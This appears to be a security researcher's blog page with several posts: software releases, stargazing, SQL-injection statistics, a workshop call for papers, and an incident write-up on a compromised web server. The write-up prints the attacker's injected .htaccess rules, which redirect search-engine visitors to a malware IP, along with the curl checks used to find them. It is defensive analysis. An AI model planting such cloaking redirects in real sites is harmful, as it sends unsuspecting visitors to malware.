Skip to content

Systrace 1.6f with 64-bit Linux ptrace support

A new version of Systrace that supports 64-bit Linux installations can be downloaded from here. The major changes are support of 64-bit Linux with ptrace as well as 32-bit binaries under a 64-bit system. Let me know if you run into any issues with this.
Categories: News, Systrace
Defined tags for this entry: , ,

Libevent 1.4.9-stable released

We just released libevent 1.4.9-stable. You can download the source from the usual place:

http://monkey.org/~provos/libevent-1.4.9-stable.tar.gz
This release fixes a number of bugs:
  • fixed several memory leaks in the HTTP layer.
  • fixed signal handling for multi-threaded applications.
  • fixed issues with the timer cache when leaving/entering the event loop.
Check here for a more detailed change list.

Thanks to Dean McNamee, Victor Chang, Alejo Sanchez, Richard Jones, Robin Haberkorn and everyone else who reported bugs or supplied patches.
Categories: Libevent, News
Defined tags for this entry: ,

Using htaccess To Distribute Malware

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:
curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas
curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.
Categories: Malware, SpyBye
Defined tags for this entry: , ,

Moon, Jupiter and Venus

Jupiter, Venus and MoonJupiter, Venus and Moon are currently in close conjunction in the evening sky. It is quite an amazing sight and can still be seen tomorrow, too. Over Thanksgiving, we also set up the telescope in front of the house to look at the moons of Jupiter which was quite fun. I tried to take a quick picture of the Moon, Jupiter and Venus, but got it over exposed. The extreme light pollution in Mountain View makes it difficult to take any pictures of the night sky.

The light pollution here is so bad that most stars are never visible. I assume there must be a good reason to waste so much electricity on lightening up the sky - I just don't know it.
Defined tags for this entry: ,

SQL Injection Redux

During my invited talk on web-based malware at USENIX Security, I mentioned SQL Injection as one of the more popular means of compromising web servers. Although I did not have a chance to post my slides, here is one graph that shows how many URLs with drive-by downloads due to SQL injection were found by Google's infrastructure in July 2008; it's over 800,000 URLs. Curiously, most of these were due to the Asprox botnet.

The situation has slightly changed since then, Asprox has become quiet and most of the SQL Injection attacks seem to originate from Chinese sites. One way to determine if a site has been injected with malicious content is the Safe Browsing diagnostic page which shows infection domains and also how many sites they compromised. Here is an example of a Chinese SQL injection domain, ko118.cn.

To help web application developers, OWASP has published detailed guidelines on preventing SQL injection attacks. More importantly if your web site was SQL injected, its database needs to be cleaned to remove the injected content.
Categories: Malware, SpyBye
Defined tags for this entry: , , ,

LEET '09 Call for Papers

The CfP for the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET '09): Botnets, Spyware, Worms, and More is up at:

http://www.usenix.org/event/leet09/cfp/.

LEET '09 will be held on April 21, 2009 in Boston, MA immediately before the 6th USENIX Symposium on Networked Systems Design and Implementation (NSDI '09), which will take place April 22–24, 2009.

Important Dates
  • Submissions due: January 16, 2009, 11:59 p.m. EST
  • Notification of acceptance: March 2, 2009
  • Electronic files due: March 30, 2009

This will be the second edition of LEET, which had evolved from the combination of two other successful workshops, the ACM Workshop on Recurring Malcode (WORM) and the USENIX Workshop on Hot Topics in Understanding Botnets (HotBots). These two workshops have each dealt with aspects of this problem. However, while papers relating to both worms and botnets are explicitly solicited, LEET has a broader charter than its predecessors. We encourage submissions of papers that focus on any aspect of the underlying mechanisms used to compromise and control hosts, the large-scale "applications" being perpetrated upon this framework, or the social and economic networks driving these threats.
Categories: News, Security, Systrace
Defined tags for this entry: , , ,